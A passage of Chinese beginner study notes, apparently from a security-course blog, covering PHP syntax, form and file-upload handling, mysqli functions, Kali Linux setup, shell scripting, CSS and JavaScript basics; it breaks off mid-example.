<h4 id="while"><a href="#while" class="headerlink" title="while"></a>while</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">while(条件表达式)&#123;</span><br><span class="line">	&#x2F;&#x2F;条件表达式就是判断边界条件</span><br><span class="line">	循环体;		&#x2F;&#x2F;循环条件的变化</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="do-while"><a href="#do-while" class="headerlink" title="do while"></a>do while</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">do&#123;</span><br><span class="line">	&#x2F;&#x2F;循环体</span><br><span class="line">&#125;while(条件表达式);</span><br><span class="line"></span><br><span class="line">do-while当条件不满足，循环会执行一次，while循环一次不执行。</span><br></pre></td></tr></table></figure>

<h4 id="break和continue进阶使用"><a href="#break和continue进阶使用" class="headerlink" title="break和continue进阶使用"></a>break和continue进阶使用</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">continue 2; 跳出x层循环，但继续循环</span><br><span class="line"></span><br><span class="line">break 2; 跳出x层循环，停止循环</span><br></pre></td></tr></table></figure>

<h3 id="6-include和require"><a href="#6-include和require" class="headerlink" title="6.include和require"></a>6.include和require</h3><p>四种包含方式区别</p>
<ul>
<li><p><code>include</code>：出现一次包含一次，如包含不到不影响后面代码执行</p>
</li>
<li><p><code>include_once</code>：包含前先判断是否曾包含过，如包含过则不重复包含。</p>
</li>
<li><p><code>require</code>：出现一次包含一次，如包含不到则会报错，终止代码执行</p>
</li>
<li><p><code>require_once</code>：和include_once相同</p>
</li>
</ul>
<p>语法格式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">include ‘文件名字’;</span><br></pre></td></tr></table></figure>

<p>嵌套包含</p>
<blockquote>
<p>包含的时候推荐使用绝对路径</p>
</blockquote>
<h3 id="7-函数"><a href="#7-函数" class="headerlink" title="7.函数"></a>7.函数</h3><p>语法格式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function 函数名([形参])&#123;</span><br><span class="line">	&#x2F;&#x2F;函数体</span><br><span class="line">	&#x2F;&#x2F;返回值：return 结果;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>调用方式：<code>函数名(实参)</code></p>
<blockquote>
<p>函数的调用可以在函数定义之前</p>
</blockquote>
<h4 id="形参和实参"><a href="#形参和实参" class="headerlink" title="形参和实参"></a>形参和实参</h4><ul>
<li>形参：函数在定义的时候圆括号中的参数</li>
<li>实参：函数在调用的时候传递的实际参数，可以是具体的值也可以是变量。</li>
</ul>
<ol>
<li><p>在PHP中允许实参多于形参（个数）：函数内部不用而已</p>
</li>
<li><p>在PHP中理论上形参个数没有限制（实际开发不会太多）</p>
</li>
<li><p>实参不能少于形参个数</p>
</li>
</ol>
<p>默认值</p>
<blockquote>
<p>默认值的定义是放在最右边的（多个），不能左边形参有默认值，但是右边没有</p>
</blockquote>
<h4 id="引用传值"><a href="#引用传值" class="headerlink" title="引用传值"></a>引用传值</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Function 函数名(形参1,&amp;形参2)&#123;</span><br><span class="line">	&#x2F;&#x2F;函数体</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>调用的时候引用传值形参对应的实参不需要写“&amp;”。</p>
</blockquote>
<blockquote>
<p>引用传值形参对应的实参必须是变量，不能写具体的值。</p>
</blockquote>
<h4 id="返回值"><a href="#返回值" class="headerlink" title="返回值"></a>返回值</h4><blockquote>
<p>（函数调用处）：在PHP中所有的函数都有返回值。（<strong>如果没有明确return使用，那么系统默认返回NULL</strong>）</p>
</blockquote>
<h4 id="return关键字"><a href="#return关键字" class="headerlink" title="return关键字"></a>return关键字</h4><ol>
<li><p>return在函数内部存在的价值：返回当前函数的结果（当前函数运行结束）</p>
</li>
<li><p>return还可以在文件中直接使用（不在函数里面）：代表文件将结果return后面跟的内容，转交给包含当前文件的位置。在文件中也代表中终止文件后面的代码：return之后的内容不会执行。</p>
</li>
</ol>
<h4 id="作用域"><a href="#作用域" class="headerlink" title="作用域"></a>作用域</h4><blockquote>
<p>$GLOBALS 这是一个超全局变量，在函数内和函数外均可访问，其中全局变量会被存入该数组，可以通过对应的数组下标实现函数内访问外部全局变量。</p>
</blockquote>
<blockquote>
<p>global 它可以实现函数内访问外部全局变量，也可以外部访问函数内局部变量。它的本质：在函数的内部和外部，对一个同名变量（全局和局部）使用同一块内存地址保存数据，从而实现共同拥有。</p>
</blockquote>
<p>基本语法：</p>
<ul>
<li>global 变量名;    //不能赋值</li>
<li>变量名 = 值;        //修改</li>
</ul>
<h4 id="静态变量"><a href="#静态变量" class="headerlink" title="静态变量"></a>静态变量</h4><blockquote>
<p>函数运行结束所有局部变量都会清空，如果重新运行一下函数，所有的局部变量又会重新初始化。但静态变量会保留之前状态。</p>
</blockquote>
<h4 id="可变函数"><a href="#可变函数" class="headerlink" title="可变函数"></a>可变函数</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$变量 &#x3D; ‘display’;                              </span><br><span class="line">function display()&#123;</span><br><span class="line">&#125;</span><br><span class="line">&#x2F;&#x2F;可变函数</span><br><span class="line">$变量();</span><br></pre></td></tr></table></figure>
<h4 id="匿名函数"><a href="#匿名函数" class="headerlink" title="匿名函数"></a>匿名函数</h4><p>基本语法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">变量名 &#x3D; function()&#123;</span><br><span class="line">	函数体</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<h3 id="8-数组"><a href="#8-数组" class="headerlink" title="8.数组"></a>8.数组</h3><p>三种定义方式</p>
<ol>
<li>使用array关键字：最常用的<ul>
<li>$变量 = array(元素1,元素2,元素3..);      </li>
</ul>
</li>
<li>可以使用中括号来包裹数据：<ul>
<li>$变量 = [元素1,元素2…];</li>
</ul>
</li>
<li>隐形定义数组：给变量增加一个中括号，系统自动变成数组<ul>
<li>$变量[] = 值1;    //如果不提供下标也可以，系统自动生成（数字：从0开始）</li>
<li>$变量[下标] = 值;    //中括号里面的内容称之为下标key，该下标可以是字母（单词）或者数字，与变量命名的规则相似</li>
</ul>
</li>
</ol>
<h4 id="数组特点"><a href="#数组特点" class="headerlink" title="数组特点"></a>数组特点</h4><ol>
<li>数组元素的顺序以放入顺序为准，跟下标无关</li>
<li>数字下标的自增长特性：从0开始自动增长，如果中间手动出现较大的，那么后面的自增长元素从最大的值+1开始</li>
<li>当后面的元素下标和前面的相同，会覆盖前面的元素。</li>
</ol>
<h4 id="foreach遍历数组"><a href="#foreach遍历数组" class="headerlink" title="foreach遍历数组"></a>foreach遍历数组</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">foreach($数组变量 as [$下标 &#x3D;&gt;] $值)&#123;</span><br><span class="line">	&#x2F;&#x2F;通过$下标访问元素的下标；通过$值访问元素的值</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="9-表单传值"><a href="#9-表单传值" class="headerlink" title="9.表单传值"></a>9.表单传值</h3><h4 id="get方式"><a href="#get方式" class="headerlink" title="get方式"></a>get方式</h4><p>1）form表单</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method&#x3D;”GET”&gt;表单元素&lt;&#x2F;form&gt;</span><br></pre></td></tr></table></figure>
<p>2）url</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">www.itcast.cn&#x2F;index.php?学科&#x3D;PHP</span><br></pre></td></tr></table></figure>
<h4 id="post方式"><a href="#post方式" class="headerlink" title="post方式"></a>post方式</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method&#x3D;”POST”&gt;表单元素&lt;&#x2F;form&gt;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>get传输数据可以在URL中对外可见，而post不可见：GET传值最终会在浏览器的地址栏中全部显示：?数据名=数据值&amp;数据名2=数据值2…</p>
</blockquote>
<p>接受数据的三种超全局变量</p>
<ul>
<li>$_GET方式：接收GET方式提交的数据</li>
<li>$_POST方式：接收POST方式提交的数据</li>
<li>$_REQUEST方式：接收POST或者GET提交的所有数据</li>
</ul>
<h3 id="10-文件上传"><a href="#10-文件上传" class="headerlink" title="10.文件上传"></a>10.文件上传</h3><p>1）method属性：表单提交方式必须为POST          //$_POST数组中有上传文件内容吗？ </p>
<p>2）<strong>enctype属性</strong>(必须写：form表单属性，主要是规范表单数据的编码方式</p>
<h4 id="上传表单写法"><a href="#上传表单写法" class="headerlink" title="上传表单写法"></a>上传表单写法</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method&#x3D;&quot;POST&quot; enctype&#x3D;&quot;multipart&#x2F;from-data action&#x3D;&quot;upload.php&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;input type&#x3D;&quot;file&quot; name&#x3D;&quot;image&quot; &#x2F;&gt;</span><br><span class="line">&lt;input type&#x3D;&quot;submit&quot; name&#x3D;&quot;btn&quot; value&#x3D;&quot;upload file&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;form&gt;</span><br></pre></td></tr></table></figure>

<h4 id="FILES"><a href="#FILES" class="headerlink" title="$_FILES"></a>$_FILES</h4><ol>
<li>name：文件在用户（浏览器端）电脑上实际存在的名字（实际用来保留后缀）</li>
<li>tmp_name：文件上传到服务器后操作系统保存的临时路径（实际用来给PHP后期使用）</li>
<li>type：MIME（多功能互联网邮件扩展）类型，用来在计算机中客户端识别文件类型（确定软件）</li>
<li>error：文件上传的代号，用来告知应用软件（PHP）文件接收过程中出现了什么问题（PHP后期根据代码进行文件判断） </li>
<li>size：文件大小（PHP根据实际需求来确定是否该保留）</li>
</ol>
<p>文件上传中用到的两个重要函数</p>
<ol>
<li><p>判断是否为上传的文件：is_uploaded_file()</p>
</li>
<li><p>移动文件：move_uploaded_file()</p>
</li>
</ol>
<h3 id="11-PHP操作数据库"><a href="#11-PHP操作数据库" class="headerlink" title="11.PHP操作数据库"></a>11.PHP操作数据库</h3><h4 id="重要函数"><a href="#重要函数" class="headerlink" title="重要函数"></a>重要函数</h4><ul>
<li>mysqli_connect() 函数: 打开一个到 MySQL 服务器的新的连接。</li>
</ul>
<p>语法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysqli_connect(host,username,password,dbname,port,socket);</span><br><span class="line"></span><br><span class="line">host	           规定主机名或 IP 地址。</span><br><span class="line">Username        规定 MySQL 用户名。</span><br><span class="line">Password         规定 MySQL 密码。</span><br><span class="line">dbname	           规定默认使用的数据库。</span><br><span class="line">port	           规定尝试连接到 MySQL 服务器的端口号。</span><br></pre></td></tr></table></figure>

<ul>
<li><p>mysqli_close($conn)中断MySQL服务器的连接</p>
</li>
<li><p>mysqli_query() 函数执行某个针对数据库的查询。</p>
</li>
</ul>
<p>语法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysqli_query(connection,query,resultmode);</span><br><span class="line">connection	必需。规定要使用的 MySQL 连接。</span><br><span class="line">query	             必需，规定查询字符串。</span><br></pre></td></tr></table></figure>

<ul>
<li>mysqli_num_rows()返回结果集中行的数量</li>
</ul>
<p>语法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysqli_num_rows($result);</span><br></pre></td></tr></table></figure>

<ul>
<li>mysqli_fetch_assoc()从结果集中取得一行作为关联数组</li>
<li>mysqli_fetch_array()从结果集中取得一行作为索引数组或关联数组，或两者兼有</li>
</ul>
<h1 id="B级别-一般知识点"><a href="#B级别-一般知识点" class="headerlink" title="B级别:一般知识点"></a>B级别:一般知识点</h1><h2 id="一、网络安全法"><a href="#一、网络安全法" class="headerlink" title="一、网络安全法"></a>一、网络安全法</h2><ol>
<li>违反本法第二十七条规定，受到治安管理处罚的人员，五年内不得从事网络安全管理和网络运营关键岗位的工作；受到刑事处罚的人员，终身不得从事网络安全管理和网络运营关键岗位的工作。</li>
</ol>
<h2 id="二、虚拟机："><a href="#二、虚拟机：" class="headerlink" title="二、虚拟机："></a>二、虚拟机：</h2><h3 id="1-做快照"><a href="#1-做快照" class="headerlink" title="1.做快照"></a>1.做快照</h3><pre><code>(1)运行状态下做快照
(2)关机状态下做快照
建议虚拟机装好后配置好相应的环境及安装好相应工具后做个快照。</code></pre><h3 id="2-做克隆"><a href="#2-做克隆" class="headerlink" title="2.做克隆"></a>2.做克隆</h3><pre><code>(1)链接克隆   占用硬盘空间少，建立速度快，但克隆母体删掉或损坏会影响链接克隆。
(2)完全克隆   占用硬盘空间多，建立速度慢，但独立于克隆母体。</code></pre><h2 id="三、Linux"><a href="#三、Linux" class="headerlink" title="三、Linux"></a>三、Linux</h2><h3 id="1-linux发行版概念"><a href="#1-linux发行版概念" class="headerlink" title="1.linux发行版概念"></a>1.linux发行版概念</h3><p>Linux只定义/实现了一个内核。内核必须同命令、守护进程以及其他软件一起打包来组成一个可以使用的完整操作系统，这种打包就是Distribution，中文一般称为发行版本。</p>
<h3 id="2-kali初始设置"><a href="#2-kali初始设置" class="headerlink" title="2.kali初始设置"></a>2.kali初始设置</h3><p>以<code>root</code>登录</p>
<p><code>sudo passwd root</code>修改<code>root</code>密码</p>
<p>重启后以<code>root</code>身份登录</p>
<p>更新源：<br><code>vim /etc/apt/sources.list</code> 在末尾加入下列源</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#阿里云</span><br><span class="line">deb http:&#x2F;&#x2F;mirrors.aliyun.com&#x2F;kali kali-rolling main non-free contrib</span><br><span class="line">deb-src http:&#x2F;&#x2F;mirrors.aliyun.com&#x2F;kali kali-rolling main non-free contrib</span><br><span class="line">#清华大学</span><br><span class="line">deb http:&#x2F;&#x2F;mirrors.tuna.tsinghua.edu.cn&#x2F;kali kali-rolling main contrib non-free</span><br><span class="line">deb-src https:&#x2F;&#x2F;mirrors.tuna.tsinghua.edu.cn&#x2F;kali kali-rolling main contrib non-free</span><br></pre></td></tr></table></figure>
<p>换完源之后在终端输入：<code>apt-get update &amp;&amp; apt-get upgrade &amp;&amp; apt-get clean</code></p>
<p>更新源和更新软件<br>命令：<code>apt-get update &amp;&amp; apt-get upgrade &amp;&amp; apt-get clean</code></p>
<p><strong>Kali2020官方教程中建议使用<code>apt</code></strong></p>
<p><code>apt-get update</code><br>只更新软件包的索引源，作用是同步源的软件包的索引信息，从而进行软件更新。<br><code>apt-get upgrade</code><br>升级系统上安装的所有软件包，所更新失败，所涉及的包会保持更新之前的状态。<br><code>apt-get clean</code><br>把已安装的软件包的安装包删除掉。</p>
<h3 id="Kali开启ssh"><a href="#Kali开启ssh" class="headerlink" title="Kali开启ssh"></a>Kali开启ssh</h3><ol>
<li>vim /etc/ssh/sshd_config</li>
</ol>
<p>(1) 允许root登录 <code>permitrootlogin  yes</code></p>
<p>(2) 允许密码登录 <code>#PasswordAuthentication no</code></p>
<ol start="2">
<li><p>重启ssd服务 <code>/etc/init.d/ssh restart</code></p>
</li>
<li><p>添加开机启动 <code>update-rc.d ssh enable</code> 或使用<code>systemctl enable ssh</code></p>
</li>
</ol>
<h2 id="四：数据库"><a href="#四：数据库" class="headerlink" title="四：数据库"></a>四：数据库</h2><ol>
<li>按照数据库规模分类</li>
</ol>
<p>小型关系型数据库：</p>
<ul>
<li>Microsoft Access</li>
<li>SQLite</li>
</ul>
<p>中型关系型数据库：</p>
<ul>
<li>SQL Server</li>
<li>Mysql</li>
</ul>
<p>大型关系型数据库：</p>
<ul>
<li>Oracle</li>
<li>DB2</li>
</ul>
<ol start="2">
<li>MySQL发展史</li>
</ol>
<p>AB公司被Sun公司收购—》Oracle又收购了Sun公司</p>
<h2 id="五、SHELL编程"><a href="#五、SHELL编程" class="headerlink" title="五、SHELL编程"></a>五、SHELL编程</h2><ol>
<li><p>shell指定解释器：<code>#!/bin/bash</code></p>
</li>
<li><p>脚本后缀没要求，但为了让别人知道脚本类型，推荐使用<code>.sh</code>作为后缀名</p>
</li>
<li><p>运行脚本前需要先赋予可执行权限。<code>./</code>文件名运行脚本</p>
</li>
<li><p>变量名和等号之间不能有空格</p>
</li>
<li><p>变量声明时不加<code>$</code>符号，但使用时需要加<code>$</code>符号。为了避免歧义，可以把变量名用花括号<code>{ }</code>括起来。</p>
</li>
<li><p><code>readonly</code>只读变量，不能改变变量值，不能用<code>unset</code>删除变量。</p>
</li>
<li><p><code>#</code>可以用来输出变量长度，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo $&#123;#string&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>获取文件名和后缀</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$&#123;string%.*&#125;</span><br><span class="line">$&#123;string#*.&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p># 注释符</p>
</li>
<li><p>运行脚本时可以传递参数，其中<code>$0</code>代表文件名，<code>$1…$n</code>代表第一个<code>…</code>第<code>n</code>个参数，<code>$10</code>及更大的数字需要用花括号把数字括起来。</p>
</li>
<li><p><code>$#</code>代表传递的参数个数，<code>$*</code>以及<code>$@</code>代表显示所有向脚本传递的参数。</p>
</li>
<li><p>shell脚本中<em>需要转义,写成`\</em>`</p>
</li>
<li><p>if结构   例如：（注意闭合if,以及结构中执行体内容不能为空）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">if [[ $a -lt 100 &amp;&amp; $b -gt 100 ]]</span><br><span class="line">then</span><br><span class="line">   echo &quot;返回 true&quot;</span><br><span class="line">else</span><br><span class="line">   echo &quot;返回 false&quot;</span><br><span class="line">fi</span><br></pre></td></tr></table></figure></li>
<li><p>echo -e “OK! \n” # -e 开启转义</p>
</li>
<li><p>printf可以格式化打印。</p>
</li>
<li><p>while condition</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">do</span><br><span class="line">    command</span><br><span class="line">done</span><br></pre></td></tr></table></figure></li>
<li><p>case</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">case 值 in</span><br><span class="line">模式1)</span><br><span class="line">    command1</span><br><span class="line">    command2</span><br><span class="line">    ...</span><br><span class="line">    commandN</span><br><span class="line">    ;;</span><br><span class="line">模式2）</span><br><span class="line">    command1</span><br><span class="line">    command2</span><br><span class="line">    ...</span><br><span class="line">    commandN</span><br><span class="line">    ;;</span><br><span class="line">esac</span><br></pre></td></tr></table></figure></li>
<li><p>read 变量名 接收用户输入</p>
</li>
</ol>
<h2 id="六、CSS层叠样式表"><a href="#六、CSS层叠样式表" class="headerlink" title="六、CSS层叠样式表"></a>六、CSS层叠样式表</h2><p>1.层叠样式表三种使用方式<br>内联样式（标签内定义）</p>
<p>内部样式<br><code>&lt;head&gt;</code>标签内用<code>&lt;style&gt;</code>定义<br>如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;head&gt;</span><br><span class="line">&lt;style&gt;</span><br><span class="line">hr &#123;color:sienna;&#125;</span><br><span class="line">p &#123;margin-left:20px;&#125;</span><br><span class="line">body &#123;background-image:url(&quot;images&#x2F;back40.gif&quot;);&#125;</span><br><span class="line">&lt;&#x2F;style&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br></pre></td></tr></table></figure>
<p>外部样式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;head&gt;标签中用&lt;link&gt;定义，外部样式文件以.css结尾</span><br><span class="line">如：</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;link rel&#x3D;&quot;stylesheet&quot; type&#x3D;&quot;text&#x2F;css&quot; href&#x3D;&quot;mystyle.css&quot;&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br></pre></td></tr></table></figure>
<h2 id="七、JavaScript"><a href="#七、JavaScript" class="headerlink" title="七、JavaScript"></a>七、JavaScript</h2><p>1.<code>Java</code>和<code>JavaScript</code>的关系</p>
<p><strong>两者没关系</strong></p>
<p>2.脚本所在位置</p>
<p>可以和html代码共存，用<code>&lt;script&gt;&lt;/script&gt;</code>标签界定代码边界。</p>
<p>3.函数</p>
<h3 id="一、定义语法"><a href="#一、定义语法" class="headerlink" title="一、定义语法"></a>一、定义语法</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">function  函数名称()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">   具体代码……</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="二、全局变量和局部变量"><a href="#二、全局变量和局部变量" class="headerlink" title="二、全局变量和局部变量"></a>二、全局变量和局部变量</h3><p>局部变量：在函数内定义，只有函数内能访问<br>全局变量：函数外声明，所有脚本和函数都能访问。</p>
<h3 id="三、变量生命周期"><a href="#三、变量生命周期" class="headerlink" title="三、变量生命周期"></a>三、变量生命周期</h3><p>JavaScript 变量的生命期从它们被声明的时间开始。<br>局部变量会在函数运行以后被删除。<br>全局变量会在页面关闭后被删除。</p>
<h3 id="四、外部调用JS脚本"><a href="#四、外部调用JS脚本" class="headerlink" title="四、外部调用JS脚本"></a>四、外部调用JS脚本</h3><ol>
<li>外部脚本后缀名以.js结尾</li>
<li>外部脚本代码中不要再出现<code>&lt;script&gt;</code>标签，直接写脚本内容</li>
<li>引用方式：<br><code>&lt;script src=&quot;http://192.168.239.139/myScript.js&quot;&gt;&lt;/script&gt;</code></li>
</ol>
<h3 id="五、输出方式"><a href="#五、输出方式" class="headerlink" title="五、输出方式"></a>五、输出方式</h3><h4 id="弹出警告框"><a href="#弹出警告框" class="headerlink" title="弹出警告框"></a>弹出警告框</h4><p>使用 <code>window.alert()</code> 弹出警告框。（<code>window.</code>可以不写，直接写<code>alert</code>，<code>alert</code>括号中如果是数字不需要加引号，如果是字符串，需要加引号）</p>
<p>写到HTML文档中<br>  使用 document.write() 方法将内容写到 HTML 文档中。</p>
<p>写到HTML元素中<br>  使用 innerHTML 写入到 HTML 元素。</p>
<h3 id="六、变量"><a href="#六、变量" class="headerlink" title="六、变量"></a>六、变量</h3><ol>
<li><p>用var声明变量</p>
</li>
<li><p>驼峰命名变量：</p>
<p> 大驼峰（每个单词首字母大写，其他字母小写），</p>
<p> 小驼峰（第一个单词全部小写，后面单词首字母大写）</p>
</li>
</ol>
<h3 id="七、注释"><a href="#七、注释" class="headerlink" title="七、注释"></a>七、注释</h3><p>单行注释：//<br>多行注释：/*  */</p>
<h3 id="八、大小写敏感"><a href="#八、大小写敏感" class="headerlink" title="八、大小写敏感"></a>八、大小写敏感</h3><h3 id="九、数组"><a href="#九、数组" class="headerlink" title="九、数组"></a>九、数组</h3><h4 id="一、定义方式"><a href="#一、定义方式" class="headerlink" title="一、定义方式"></a>一、定义方式</h4><p>1: 直接赋值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">var names &#x3D; [“zhangsan&quot;, “li&quot;, “wangwu&quot;];</span><br><span class="line">var names &#x3D; [12, 23, 45, 56];</span><br></pre></td></tr></table></figure>
<p>2:先new再赋值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">var cars&#x3D;new Array();</span><br><span class="line">cars[0]&#x3D;&quot;Saab&quot;;</span><br><span class="line">cars[1]&#x3D;&quot;Volvo&quot;;</span><br><span class="line">cars[2]&#x3D;&quot;BMW&quot;;</span><br></pre></td></tr></table></figure>
<p>3:new的时候直接赋值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var cars&#x3D;new Array(&quot;Saab&quot;,&quot;Volvo&quot;,&quot;BMW&quot;);</span><br></pre></td></tr></table></figure>
<h3 id="十、对象"><a href="#十、对象" class="headerlink" title="十、对象"></a>十、对象</h3><p>一、定义对象：</p>
<p>单行定义：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var person &#x3D; &#123;firstName:&quot;Bill&quot;, lastName:&quot;Gates&quot;, age:62, eyeColor:&quot;blue&quot;&#125;;</span><br></pre></td></tr></table></figure>
<p>多行定义：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">var person &#x3D; &#123;</span><br><span class="line">    firstName:&quot;Bill&quot;,</span><br><span class="line">    lastName:&quot;Gates&quot;,</span><br><span class="line">    age:62,</span><br><span class="line">    eyeColor:&quot;blue&quot;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>二、访问对象属性</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">person.lastName;</span><br></pre></td></tr></table></figure>
<p>三、访问对象方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">person.fullName();</span><br></pre></td></tr></table></figure>
<h3 id="十一、if选择结构"><a href="#十一、if选择结构" class="headerlink" title="十一、if选择结构"></a>十一、if选择结构</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">if (condition1)</span><br><span class="line">&#123;</span><br><span class="line">    当条件 1 为 true 时执行的代码</span><br><span class="line">&#125;</span><br><span class="line">else if (condition2)</span><br><span class="line">&#123;</span><br><span class="line">    当条件 2 为 true 时执行的代码</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">  当条件 1 和 条件 2 都不为 true 时执行的代码</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="十二、switch选择结构"><a href="#十二、switch选择结构" class="headerlink" title="十二、switch选择结构"></a>十二、switch选择结构</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">switch(n)</span><br><span class="line">&#123;</span><br><span class="line">    case 1:</span><br><span class="line">        执行代码块 1</span><br><span class="line">        break;</span><br><span class="line">    case 2:</span><br><span class="line">        执行代码块 2</span><br><span class="line">        break;</span><br><span class="line">    default:</span><br><span class="line">        与 case 1 和 case 2 